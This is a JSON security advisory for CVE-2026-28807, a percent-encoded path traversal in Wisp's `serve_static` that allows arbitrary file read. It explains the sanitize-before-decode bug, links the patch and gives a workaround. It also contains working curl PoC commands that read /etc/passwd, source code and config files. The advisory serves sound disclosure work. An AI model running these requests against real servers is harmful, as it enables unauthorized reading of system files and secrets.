{"id":"GHSA-h7cj-j2vv-qw8r","summary":"Wisp Vulnerable to Path Traversal","details":"### Summary\n\n`wisp.serve_static` is vulnerable to arbitrary file read via percent-encoded path traversal (`%2e%2e`). The directory traversal sanitization runs before percent-decoding, allowing encoded `..` sequences to bypass the filter. An unauthenticated attacker can read any file readable by the application process in a single HTTP request.\n\n### Details\n\nIn `src/wisp.gleam`, `serve_static` processes the request path in this order:\n\n```gleam\nlet path =\n  path\n  |\u003e string.drop_start(string.length(prefix))\n  |\u003e string.replace(each: \"..\", with: \"\")   // Step 1: sanitize\n  |\u003e filepath.join(directory, _)\n\nlet path = case uri.percent_decode(path) {  // Step 2: decode\n  Ok(p) -\u003e p\n  Error(_) -\u003e path\n}\n```\n\nSanitization (step 1) strips literal `..` but runs **before** percent-decoding (step 2). The encoded sequence `%2e%2e` passes through `string.replace` unchanged, then `uri.percent_decode` converts it to `..`, which the OS resolves as directory traversal when the file is read.\n\n### PoC\n\nAny application using `wisp.serve_static`:\n\n```gleam\nfn handle_request(req: wisp.Request) -\u003e wisp.Response {\n  use \u003c- wisp.serve_static(req, under: \"/static\", from: priv_directory())\n  wisp.not_found()\n}\n```\n\nExploit (requires `--path-as-is` to prevent client-side normalization):\n\n```bash\n# Read /etc/passwd\ncurl -s --path-as-is \\\n  \"http://localhost:8080/static/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\"\n\n# Read project source code\ncurl -s --path-as-is \\\n  \"http://localhost:8080/static/%2e%2e/%2e%2e/src/app.gleam\"\n\n# Read project config\ncurl -s --path-as-is \\\n  \"http://localhost:8080/static/%2e%2e/%2e%2e/gleam.toml\"\n```\n\n### Impact\n\nThis is a **path traversal / arbitrary file read** vulnerability (CWE-22). Any application using `wisp.serve_static` is affected. An unauthenticated attacker can read:\n\n- Application source code\n- Configuration and secrets in `priv/`\n- `.env` files, `secret_key_base`, private keys\n- System files (`/etc/passwd`, `/etc/shadow` if permissions allow)\n\n### Workaround\n\nCopy the [fixed implementation](https://github.com/gleam-wisp/wisp/blob/161118c431047f7ef1ff7cabfcc38981877fdd93/src/wisp.gleam#L1413-L1461) to your codebase and replace references to wisp.serve_static with this version in your codebase.\n\n### References\n\n* Commit that introduced the vulnerability: https://github.com/gleam-wisp/wisp/commit/129dcb1fe10ab1e676145d91477535e1c90ab550\n* Patch Commit: https://github.com/gleam-wisp/wisp/commit/161118c431047f7ef1ff7cabfcc38981877fdd93","aliases":["CVE-2026-28807","EEF-CVE-2026-28807"],"modified":"2026-04-06T23:34:45.300721Z","published":"2026-03-11T00:11:39Z","database_specific":{"github_reviewed_at":"2026-03-11T00:11:39Z","cwe_ids":["CWE-22"],"severity":"HIGH","nvd_published_at":"2026-03-10T22:16:18Z","github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/gleam-wisp/wisp/security/advisories/GHSA-h7cj-j2vv-qw8r"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28807"},{"type":"WEB","url":"https://github.com/gleam-wisp/wisp/commit/129dcb1fe10ab1e676145d91477535e1c90ab550"},{"type":"WEB","url":"https://github.com/gleam-wisp/wisp/commit/161118c431047f7ef1ff7cabfcc38981877fdd93"},{"type":"WEB","url":"https://cna.erlef.org/cves/CVE-2026-28807.html"},{"type":"PACKAGE","url":"https://github.com/gleam-wisp/wisp"},{"type":"WEB","url":"https://osv.dev/vulnerability/EEF-CVE-2026-28807"}],"affected":[{"package":{"name":"wisp","ecosystem":"Hex","purl":"pkg:hex/wisp"},"ranges":[{"type":"SEMVER","events":[{"introduced":"2.1.1"},{"fixed":"2.2.1"}]}],"versions":["2.1.1","2.2.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-h7cj-j2vv-qw8r/GHSA-h7cj-j2vv-qw8r.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"}]}